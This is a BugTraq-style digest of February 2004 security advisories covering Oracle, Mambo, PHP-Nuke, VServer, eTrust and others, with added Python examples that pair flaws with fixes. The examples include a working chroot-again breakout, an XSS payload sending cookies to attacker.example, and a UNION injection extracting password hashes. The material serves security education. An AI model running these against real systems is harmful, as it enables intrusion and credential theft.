SecurityFocus
1. Multiple Oracle Database Parameter/Statement Buffer Overflow...
BugTraq ID: 9587
Remote: Yes
Date Published: Feb 05 2004
Relevant URL:
http://www.securityfocus.com/bid/9587
Summary:
Oracle is a commercial database product available for a number of platforms,
including Microsoft Windows and Unix and Linux variants.
Oracle Database has been reported prone to multiple buffer overflow
vulnerabilities when processing certain parameters and functions.
Specifically, the TIME_ZONE session parameter lacks sufficient boundary
checks. An excessive value assigned to TIME_ZONE may therefore overrun the
bounds of a stack-based buffer, corrupting adjacent memory and ultimately
allowing arbitrary code execution.
The NUMTOYMINTERVAL and NUMTODSINTERVAL functions have also been reported
prone to buffer overflows. Both issues stem from a lack of sufficient
boundary checks on the char_expr parameter, and both may be triggered by
passing excessive data as the second argument of a call to the affected
function.
Finally, the FROM_TZ function has been reported prone to a buffer overflow
vulnerability that presents itself when excessive data is passed as the
third parameter of an otherwise properly formatted FROM_TZ call.
Any one of these issues may be exploited to execute arbitrary code with
elevated privileges (those of the database server process). Triggering
them requires the ability to submit SQL to the database, for example
through an existing account or through an SQL injection flaw in a
front-end application, so "Remote: Yes" should be read in that light.
2. Mambo Open Source Itemid Parameter Cross-Site Scripting Vuln...
BugTraq ID: 9588
Remote: Yes
Date Published: Feb 05 2004
Relevant URL:
http://www.securityfocus.com/bid/9588
Summary:
Mambo Open Source is a web based content management system.
A vulnerability has been reported in the application that may allow a
remote attacker to execute arbitrary HTML or script code in a user's
browser. The issue is due to insufficient sanitization of user-supplied
data passed through the 'Itemid' parameter of the 'index.php' script. An
attacker may exploit it by constructing a URL that carries malicious HTML
or script code in that parameter; the code is rendered in the browser of
any user who follows the link, in the security context of the site.
Successful exploitation may allow an attacker to steal cookie-based
authentication credentials. Other attacks are also possible.
Mambo Open Source version 4.6 has been reported prone to this issue;
other versions may be affected as well.
4. Apache-SSL Client Certificate Forging Vulnerability
BugTraq ID: 9590
Remote: Yes
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9590
Summary:
Apache-SSL is an implementation of SSL (Secure Sockets Layer) for the
Apache web server.
Apache-SSL has been reported prone to a vulnerability that exists when it
is configured with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth
enabled. SSLFakeBasicAuth translates a verified client certificate into a
Basic authentication identity: the certificate's one-line DN becomes the
user name and the fixed password "password" is assumed. A server with this
configuration has been reported to let a remote attacker impersonate a
certificate holder without presenting that certificate.
The attacker may exploit this issue by connecting to the affected service
and supplying, as ordinary Basic authentication credentials, the one-line
DN of a valid user together with the password "password". The server then
treats the request as if that user's client certificate had been verified.
This issue is reported to affect Apache-SSL 1.3.28+1.52 and all earlier
versions.
5. Joe Lumbroso Jack's Formmail.php Unauthorized Remote File Up...
BugTraq ID: 9591
Remote: Yes
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9591
Summary:
Jack's Formmail.php is a web based form-to-e-mail gateway. The application
is written in PHP; a Perl version is available as well.
A vulnerability has been reported in the software that may allow a remote
attacker to gain unauthorized access to a vulnerable server and upload
arbitrary files.
The software verifies the origin of a request via the HTTP Referer header.
Due to improper validation in the 'check_referer()' function, an attacker
can bypass the check by supplying an empty Referer value. The attacker may
then upload a file via the 'css' variable of the 'file.php' script.
Successful exploitation may allow an attacker to save malicious files on
the system or potentially overwrite sensitive files. A Referer check is in
any case a weak origin control, since the header is entirely
client-supplied.
Although unconfirmed, Formmail.php versions 5.0 and prior may be affected
by this issue.
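The following is an added illustration, not code from Formmail.php or from
this advisory, of the flaw class described above: a Referer check that
accepts an empty header, the stricter version of the same check, and the
per-session token that should gate an upload instead. The allowed host
names, the secret, the 'X-Form-Token' header and the sample requests are all
constructed for the example.

```python
import hashlib
import hmac
from typing import Optional
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.example.org", "example.org"}     # assumed site configuration
SERVER_SECRET = b"constructed-secret-for-the-example"  # real deployments: random, per site


def check_referer_weak(referer: Optional[str]) -> bool:
    """Models the flaw reported in check_referer(): a request with no Referer,
    or an empty one, is accepted, so the check only rejects *wrong* referers."""
    if not referer:
        return True
    return urlsplit(referer).hostname in ALLOWED_HOSTS


def check_referer_strict(referer: Optional[str]) -> bool:
    """Rejects absent and empty headers and matches the host component exactly
    (so 'www.example.org.evil.example' does not pass)."""
    if not referer:
        return False
    host = urlsplit(referer).hostname
    return host is not None and host.lower() in ALLOWED_HOSTS


def issue_form_token(session_id: str) -> str:
    """Per-session token embedded in the form: this, not the Referer, proves
    the request came from a form the server handed out."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_form_token(session_id: str, token: Optional[str]) -> bool:
    if not token:
        return False
    return hmac.compare_digest(issue_form_token(session_id), token)


def accept_upload(headers: dict, session_id: str) -> bool:
    """Hardened gate for the upload path. The Referer is not consulted for the
    decision because browsers and proxies legitimately strip it and attackers
    freely set it; only the token decides."""
    return verify_form_token(session_id, headers.get("X-Form-Token"))


# Constructed requests of the kinds discussed above.
REQUESTS = {
    "legit":      {"Referer": "http://www.example.org/form.html"},
    "bypass":     {"Referer": ""},                         # the reported bypass
    "absent":     {},
    "spoofed":    {"Referer": "http://www.example.org/"},  # header is client-chosen
    "other_site": {"Referer": "http://evil.example/"},
}
```

Note that even check_referer_strict accepts the "spoofed" request: the
strict check closes the empty-header hole but cannot tell a genuine browser
from a client that simply sends the expected header.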
6. Linux VServer Project CHRoot Breakout Vulnerability
BugTraq ID: 9596
Remote: No
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9596
Summary:
The Linux VServer Project consists of a Linux kernel patch and a set of
tools that partition a single Linux server into multiple virtual servers.
It is implemented with a combination of "security contexts", chroot,
segmented routing, extended quotas and other standard tools.
VServer has been reported prone to a breakout vulnerability that allows a
malicious user to escape the context of the virtual server. The issue is
due to VServer failing to protect itself against the well-known
"chroot-again" technique. Successful exploitation may allow an attacker to
access the file system outside the chrooted root directory.
The issue is leveraged when a process running inside the virtual server
itself calls chroot(). The process changes its current directory to the
root of the virtual server, creates a temporary directory and chroots
itself into that directory. Its current working directory is now outside
the directory it is chrooted to, and because the kernel only stops a ".."
walk at the process's own root, repeated calls to chdir("..") move the
process up to the true root directory of the host.
Since chroot() itself requires superuser privileges, this makes it
possible for a local user with superuser access inside the virtual server
to execute commands outside of the VServer context, and possibly to gain
unrestricted access to the host system.
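The following added example (not VServer code, and not from the original
advisory) shows the walk described above in two forms. simulate_chroot_again
is a small model of the two pieces of kernel state involved, the process root
and its working directory, and shows why the escape works and why it stops
once the working directory is moved inside the new root. chroot_again runs
the real sequence and needs root inside an unprotected virtual server; the
closing chroot(".") is the conventional last step of the technique and is
not spelled out on this page. The directory name "tmpdir" and the
"/vservers/v1" path are assumptions.

```python
import os
import posixpath


def simulate_chroot_again(vserver_root: str, depth: int, move_cwd: bool = False) -> str:
    """Model of the kernel state the sequence relies on. State is the pair
    (root, cwd) as absolute host paths. chroot() changes root only; the
    working directory stays where it was unless the process chdir()s
    afterwards. A '..' component is a no-op at the process root and at the
    real '/', and otherwise goes to the parent. Returns the directory the
    process ends up in; '/' means it reached the host root."""
    root = cwd = vserver_root                        # chdir to the vserver root
    tmp = posixpath.join(vserver_root, "tmpdir")     # mkdir + chroot(tmpdir)
    root = tmp
    if move_cwd:                                     # hardened: cwd moved inside
        cwd = tmp
    for _ in range(depth):                           # chdir("..") repeatedly
        if cwd != root and cwd != "/":
            cwd = posixpath.dirname(cwd)
    return cwd                                       # chroot(".") would pin this as root


def chroot_again(depth: int = 64, tmpdir: str = "tmpdir") -> list:
    """Runs the real sequence. Requires CAP_SYS_CHROOT (root) inside the
    virtual server; on a protected kernel the walk stays inside. Returns the
    directory listing of '/' as seen afterwards so the caller can compare it
    with the virtual server's own root."""
    os.chdir("/")
    os.makedirs(tmpdir, mode=0o700, exist_ok=True)
    os.chroot(tmpdir)            # cwd is still the old "/", outside the new root
    for _ in range(depth):
        os.chdir("..")           # never hits the new root, so climbs to the host root
    os.chroot(".")               # conventional final step: make the host root our root
    return sorted(os.listdir("/"))


if __name__ == "__main__":
    print("model, 8 x chdir('..')        :", simulate_chroot_again("/vservers/v1", 8))
    print("model, cwd moved into new root:", simulate_chroot_again("/vservers/v1", 8, move_cwd=True))
    if os.geteuid() == 0:
        print("real run, listing of '/':", chroot_again())
```

The model makes the defensive rule visible: a chroot() caller (or a kernel
that enforces it) must ensure the working directory lies inside the new root
before any further path walk, otherwise ".." escapes.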
7. OpenJournal Authentication Bypassing Vulnerability
BugTraq ID: 9598
Remote: Yes
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9598
Summary:
OpenJournal is a web-based application implemented in Perl that features
automated file creation, automated index updating, editing of files
through a web-based interface and automated archiving.
OpenJournal has been reported prone to an authentication bypass
vulnerability caused by the application failing to properly validate
parameters supplied in the URI. Successful exploitation may allow remote
attackers to gain unauthorized access to the journal files managed by the
application, to add new users to the database, and to carry out a number
of other actions.
The issue lies in the handling of the 'uid' URI parameter: an attacker may
gain access to the OpenJournal control panel by assigning a specially
crafted value to 'uid' and submitting the request to the application.
8. Apache mod_php Global Variables Information Disclosure Weakn...
BugTraq ID: 9599
Remote: Yes
Date Published: Feb 07 2004
Relevant URL:
http://www.securityfocus.com/bid/9599
Summary:
Apache is a freely available, open source web server distributed and
maintained by the Apache Group. mod_php is an Apache module that embeds
the PHP interpreter in the server.
A weakness has been reported in mod_php that may allow remote attackers to
disclose sensitive information by influencing global variables.
The issue reportedly presents itself when php.ini contains
'register_globals = on'. If a request is served for a virtual host
configured with 'php_admin_flag register_globals off', and the same server
process then serves a request for a different virtual host that lacks that
directive, the setting from the first request may carry over into the
second, so the effective value of register_globals on a host depends on
which request the process handled previously. Because register_globals
turns request parameters into PHP variables, this could lead to other
vulnerabilities such as PHP file inclusion, and an attacker may be able to
disclose sensitive information in order to gain unauthorized access.
Setting register_globals off in php.ini itself, rather than per virtual
host, avoids depending on the per-request override.
10. Brad Fears PHPCodeCabinet comments.php HTML Injection Vulner...
BugTraq ID: 9601
Remote: Yes
Date Published: Feb 07 2004
Relevant URL:
http://www.securityfocus.com/bid/9601
Summary:
PHPCodeCabinet is a web based application that allows software developers
to store code snippets in any language.
A vulnerability has been reported in the software that may allow a remote
attacker to execute HTML and script code in a user's browser. The problem
is due to improper sanitizing of user-supplied data passed through the
'sid' parameter of the 'comments.php' script. An attacker may include
malicious HTML code in the vulnerable parameter; the injected code is then
interpreted by the browser of a user visiting the vulnerable site, in the
security context of the affected site.
Successful exploitation of this attack may allow an attacker to steal
cookie-based authentication credentials. Other attacks are also possible.
PHPCodeCabinet versions 0.4 and prior have been reported to be vulnerable
to this issue.
11. The Palace Graphical Chat Client Remote Buffer Overflow Vuln...
BugTraq ID: 9602
Remote: Yes
Date Published: Feb 07 2004
Relevant URL:
http://www.securityfocus.com/bid/9602
Summary:
The Palace is a graphical chat client application.
A vulnerability has been reported to exist in the software that may allow
a remote attacker to execute arbitrary code on a vulnerable system in
order to gain unauthorized access. The condition is present due to
insufficient boundary checking.
It has been reported that The Palace chat client allows users to join a
chat server via specially crafted hyperlinks that automatically load the
application and connect to a server:
palace://example:9998/
The issue presents itself when a user attempts to follow a link that is
excessively long such as:
palace://('a'x118)('BBBB')('XXXX')
The immediate consequence of an attack may be a denial of service
condition. An attacker may leverage the issue further by exploiting the
unbounded memory copy operation to overwrite the saved return address or
base pointer, causing an affected procedure to return to an address of
their choice. Because the client registers the palace:// scheme, the
overlong link can be delivered through a web page or message and is
triggered simply by following it.
Successful exploitation may allow an attacker to execute arbitrary code in
the context of the vulnerable user in order to gain unauthorized access;
however, this has not been confirmed at the moment.
The Palace chat client versions 3.5 and prior have been reported to be
prone to this issue.
13. Nadeo Game Engine Remote Denial of Service Vulnerability
BugTraq ID: 9604
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9604
Summary:
Nadeo Game Engine is a multiplayer game engine used in several Nadeo
titles.
A vulnerability has been reported in the software that may allow a remote
attacker to cause a denial of service condition. Trackmania, one of the
affected titles, has been reported to use TCP port 2350 for game
communication; sending arbitrary data to this port may trigger the
condition.
Successful exploitation may cause the software to crash or hang,
effectively denying service to users.
14. PHP-Nuke 'News' Module Cross-Site Scripting Vulnerability
BugTraq ID: 9605
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9605
Summary:
PHP-Nuke is a freeware content management system. Implemented in PHP, it
is available for a range of systems, including Unix, Linux, and Microsoft
Windows.
It has been reported that the PHP-Nuke 'News' module is prone to a
cross-site scripting vulnerability. The issue arises due to the module
failing to properly sanitize user-supplied information. The URI parameter
'title' is not properly sanitized of HTML tags. This could allow for
execution of hostile HTML and script code in the web client of a user who
visits a vulnerable web page. This would occur in the security context of
the site hosting the software.
Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.
It has been reported that this issue affects versions 6.x - 7.x of the
software, however earlier versions may also be vulnerable.
15. Eggdrop Share Module Arbitrary Share Bot Add Vulnerability
BugTraq ID: 9606
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9606
Summary:
Eggdrop is an open source, multi-platform IRC (Internet Relay Chat) bot
designed for IRC channel administration and maintenance. Eggdrop may be
configured as a share bot, meaning that two or more bots share user
records.
Share.mod, a component of Eggdrop, has been reported prone to a
vulnerability that may result in the compromise of an entire bot network.
The issue is due to a programming error in the check_expired_tbufs()
function that causes the intended logic not to be applied: every bot
processed by check_expired_tbufs() receives STAT_OFFERED status. An
attacker may leverage this through the share_ufyes() function, which
checks only for STAT_OFFERED status on a prospective bot before granting
it STAT_SHARE status.
Once a malicious bot holds STAT_SHARE, it is recognized as a share bot and
can perform administrative operations such as adduser, deluser and chattr
that are distributed through the entire bot network.
An attacker may exploit this condition to gain control of an Eggdrop bot
network.
18. JShop E-Commerce Suite xSearch Cross-Site Scripting Vulnerab...
BugTraq ID: 9609
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9609
Summary:
JShop E-Commerce Suite is a web based e-commerce system implemented in
PHP and backed by a MySQL database.
A vulnerability has been reported in JShop E-Commerce that may allow a
remote attacker to execute HTML or script code in a user's browser. The
issue is due to improper sanitizing of user-supplied data: HTML and script
code passed through the 'xSearch' URI parameter of the 'search.php' script
is reflected into the page. An attacker can therefore construct a
malicious link containing HTML or script code that is rendered in a user's
browser upon visiting that link, in the security context of the site.
Successful exploitation of this attack may allow an attacker to steal
cookie-based authentication credentials. Other attacks are also possible.
19. ClamAV Daemon Malformed UUEncoded Message Denial Of Service ...
BugTraq ID: 9610
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9610
Summary:
ClamAV is a freely available, open source virus scanning utility available
for Unix and Linux platforms.
A problem in the handling of specially crafted UUEncoded messages has been
identified in ClamAV that may allow an attacker to prevent the delivery of
e-mail to users.
When an attacker sends an e-mail containing UUEncoded content in which the
length of a line does not conform to UUEncoding conventions, the ClamAV
program terminates. Mail that is routed through the scanner on its way to
the system then fails to arrive at its destination, resulting in a denial
of service.
It should be noted that earlier versions of the software may also be
affected, though no information concerning the scope of the issue is
available.
21. PHP-Nuke 'Reviews' Module Cross-Site Scripting Vulnerability
BugTraq ID: 9613
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9613
Summary:
PHP-Nuke is a freeware content management system. Implemented in PHP, it
is available for a range of systems, including Unix, Linux, and Microsoft
Windows.
It has been reported that the PHP-Nuke 'Reviews' module is prone to a
cross-site scripting vulnerability. The issue arises due to the module
failing to properly sanitize user-supplied information. The URI parameter
'title' is not properly sanitized of HTML tags. This could allow for
execution of hostile HTML and script code in the web client of a user who
visits a vulnerable web page. This would occur in the security context of
the site hosting the software.
Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.
It has been reported that this issue affects versions 6.x - 7.x of the
software, however earlier versions may also be vulnerable.
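The cross-site scripting items in this issue (Mambo's 'Itemid' in index.php,
PHPCodeCabinet's 'sid' in comments.php, the 'title' parameter of the PHP-Nuke
'News' and 'Reviews' modules, and JShop's 'xSearch' in search.php) all share
one shape: a URI parameter is reflected into the page unescaped. The
following is an added example in Python, not code from any of those
projects, showing that shape beside its escaped form, the kind of link an
attacker sends, and a probe a tester can use to tell the two apart. The
payload, the host names and the parameter/page names in the usage are
constructed.

```python
import html
from urllib.parse import urlencode

# Constructed payload of the kind the advisories describe: it sends the
# victim's cookies to a host the attacker controls (name made up).
PAYLOAD = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


def render_vulnerable(param_value: str) -> str:
    """Reflects the request parameter into the page unescaped: the flaw class
    reported for Itemid, sid, title and xSearch."""
    return "<h2>Search results for: %s</h2>" % param_value


def render_fixed(param_value: str) -> str:
    """Same page with the value HTML-escaped for text content."""
    return "<h2>Search results for: %s</h2>" % html.escape(param_value, quote=True)


def render_attribute_fixed(param_value: str) -> str:
    """Reflection inside an attribute value needs quote escaping as well, which
    html.escape(quote=True) supplies, so the value cannot close the attribute."""
    return '<input type="text" name="xSearch" value="%s">' % html.escape(param_value, quote=True)


def crafted_url(script_url: str, param: str, value: str = PAYLOAD) -> str:
    """The link an attacker would send; urlencode percent-encodes the markup."""
    return "%s?%s" % (script_url, urlencode({param: value}))


# Canary a tester sends to tell escaped from unescaped reflection without
# running any script: if it comes back byte-for-byte, the page is vulnerable.
PROBE = "xss<'\">probe"


def reflects_unescaped(render, probe: str = PROBE) -> bool:
    """True when the page echoes the probe with its markup characters intact."""
    return probe in render(probe)


if __name__ == "__main__":
    print(crafted_url("http://shop.example/search.php", "xSearch"))
    print("vulnerable page reflects probe:", reflects_unescaped(render_vulnerable))
    print("fixed page reflects probe:     ", reflects_unescaped(render_fixed))
```

Escaping has to match the context the value lands in; the attribute variant
is included because escaping only angle brackets leaves a quoted attribute
open to termination with a stray quote.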
23. PHP-Nuke Public Message SQL Injection Vulnerability
BugTraq ID: 9615
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9615
Summary:
PHP-Nuke is a freeware content management system. Implemented in PHP, it
is available for a range of systems, including Unix, Linux, and Microsoft
Windows.
The 'public message' feature of PHP-Nuke has been reported prone to an SQL
injection vulnerability. The issue is due to a failure to properly
sanitize the '$p_msg' parameter in the 'public_message()' function of the
'/mainfile.php' script.
Because PHP-Nuke forces all request variables to be global within the
application, '$p_msg' may be supplied in POST, GET or COOKIE data. Within
'public_message()', '$p_msg' is decoded into '$c_mid', which is used
directly in the construction of an SQL query. An attacker could pass an
SQL UNION clause through '$p_msg' to extract data from other tables in the
database.
As a result, an attacker could modify the logic and structure of database
queries. Other attacks may also be possible, such as gaining access to
sensitive information.
It has been reported that this issue affects versions 6.x - 7.x of the
software, however earlier versions may also be vulnerable.
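The following added example is not PHP-Nuke code; it reproduces the pattern
described above in Python against an in-memory SQLite database so the UNION
extraction can be run and compared with a parameterized version. The table
and column names, the $prefix value 'nuke', and the assumption that the
decode step applied to $p_msg is base64 are all the example's own; the stored
password hash is a made-up string.

```python
import base64
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for the tables the query touches (names assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE nuke_message(mid INTEGER, title TEXT, content TEXT);
        INSERT INTO nuke_message VALUES (1, 'Welcome', 'Public notice text');
        CREATE TABLE nuke_users(user_id INTEGER, username TEXT, user_password TEXT);
        INSERT INTO nuke_users VALUES (2, 'admin', 'deadbeef-constructed-hash');
        """
    )
    return conn


def decode_p_msg(p_msg: str) -> str:
    """Assumption: the decode step the advisory mentions is base64."""
    return base64.b64decode(p_msg, validate=True).decode("utf-8")


def encode_p_msg(raw: str) -> str:
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")


def public_message_vulnerable(conn, p_msg: str):
    """Decoded value spliced straight into the query text."""
    c_mid = decode_p_msg(p_msg)
    sql = "SELECT mid, title, content FROM nuke_message WHERE mid='%s'" % c_mid
    return conn.execute(sql).fetchall()


def public_message_fixed(conn, p_msg: str):
    """Same lookup with the value validated as an integer and bound as a
    parameter; anything that is not a message id yields no rows."""
    try:
        c_mid = int(decode_p_msg(p_msg))
    except ValueError:          # bad base64, bad UTF-8 or not an integer
        return []
    return conn.execute(
        "SELECT mid, title, content FROM nuke_message WHERE mid=?", (c_mid,)
    ).fetchall()


# Constructed request values: a legitimate message id, and a UNION payload
# that pulls rows from the user table through the message lookup.
LEGIT_P_MSG = encode_p_msg("1")
UNION_P_MSG = encode_p_msg(
    "0' UNION SELECT user_id, username, user_password FROM nuke_users WHERE '1'='1"
)

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, legit :", public_message_vulnerable(db, LEGIT_P_MSG))
    print("vulnerable, union :", public_message_vulnerable(db, UNION_P_MSG))
    print("fixed, union      :", public_message_fixed(db, UNION_P_MSG))
```

The encoding layer changes nothing about the injection: an attacker simply
base64-encodes the payload, and because PHP-Nuke accepts the variable from
GET, POST or COOKIE data, a filter applied to only one of those channels
would not close the hole either.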
24. Computer Associates eTrust InoculateIT For Linux Vulnerabili...
BugTraq ID: 9616
Remote: No
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9616
Summary:
Multiple vulnerabilities have been reported in eTrust InoculateIT for
Linux, including insecure temporary file handling that allows symbolic
link attacks and permission problems that allow local attackers to modify
sensitive information.
The following specific vulnerabilities were reported:
The insecure temporary file issues are reported to exist in the following
scripts:
ino/scripts/inoregupdate
scripts/uniftest
scripts/unimove
Due to the way in which these scripts create temporary files, it is
possible for a local attacker to create a symbolic link at the predictable
location where a temporary file will be created. Operations intended for
the temporary file are then performed on whatever file the malicious link
points to. The most likely consequence is the destruction of sensitive
files, though in some circumstances, if the attacker can control the data
written, it may be possible to gain elevated privileges.
The eTrustAE.lnx/tmp/.caipcs/.sem directory has insecure permissions,
allowing local attackers to modify sensitive configuration files for the
software.
The software installs several registry files that contain various software
settings; these files simulate Windows Registry settings on Linux
installations of the software. Some of them are reported to be modifiable
by unprivileged local users, which could be exploited to lower security
settings, for example by removing scanned file types from the current
user's registry setting. Hard-coded search paths for executables may also
be embedded in user-modifiable registry files, allowing for execution of
arbitrary code with elevated privileges in some circumstances.
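The following is an added demonstration of the temporary-file issue, not
code from eTrust or from the advisory (the affected components are shell
scripts, where mktemp plays the role tempfile.mkstemp plays here). It plants a
symlink at a predictable name, shows that a plain open-for-write follows it
and clobbers the target, and shows the two ways to avoid that: O_CREAT|O_EXCL
on a fixed name, or an unpredictable name created atomically. The file name
"inoregupdate.tmp" and the victim file are constructed.

```python
import os
import tempfile


def write_unsafe(path: str, data: bytes) -> None:
    """The pattern behind the reported issue: a fixed, predictable name opened
    for writing without O_EXCL. open(..., 'wb') follows a symlink planted at
    that path and truncates whatever it points to."""
    with open(path, "wb") as f:
        f.write(data)


def write_safe_fixed_name(path: str, data: bytes) -> None:
    """If the name must be fixed: O_CREAT|O_EXCL fails when anything, a symlink
    included, already exists at the path. O_NOFOLLOW (where available) adds a
    second line of defence."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def write_safe_random_name(directory: str, data: bytes) -> str:
    """Preferred: mkstemp picks an unpredictable name and creates it with
    O_EXCL and mode 0600 in one step, so there is no window to race."""
    fd, path = tempfile.mkstemp(prefix="inoregupdate.", dir=directory)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo():
    """Plant a symlink where a script would write its temp file, then run each
    writer. Returns (victim contents after the unsafe write, whether the
    O_EXCL writer refused, whether mkstemp produced a fresh regular file)."""
    with tempfile.TemporaryDirectory() as work:
        victim = os.path.join(work, "victim.conf")          # stands in for a sensitive file
        with open(victim, "wb") as f:
            f.write(b"original configuration\n")
        planted = os.path.join(work, "inoregupdate.tmp")    # assumed predictable name
        os.symlink(victim, planted)                         # the attacker's move

        write_unsafe(planted, b"attacker-chosen content\n")
        with open(victim, "rb") as f:
            clobbered = f.read()

        try:
            write_safe_fixed_name(planted, b"should not land anywhere\n")
            refused = False
        except OSError:                                     # EEXIST (or ELOOP)
            refused = True

        fresh = write_safe_random_name(work, b"safe\n")
        fresh_ok = (not os.path.islink(fresh)
                    and os.path.basename(fresh) != "inoregupdate.tmp"
                    and os.stat(fresh).st_size == len(b"safe\n"))
        return clobbered, refused, fresh_ok


if __name__ == "__main__":
    print(demo())
```

Note that write_safe_fixed_name refuses rather than proceeds; a script that
reacts to that failure by deleting the path and retrying reopens the race,
so the random-name variant is the one to prefer.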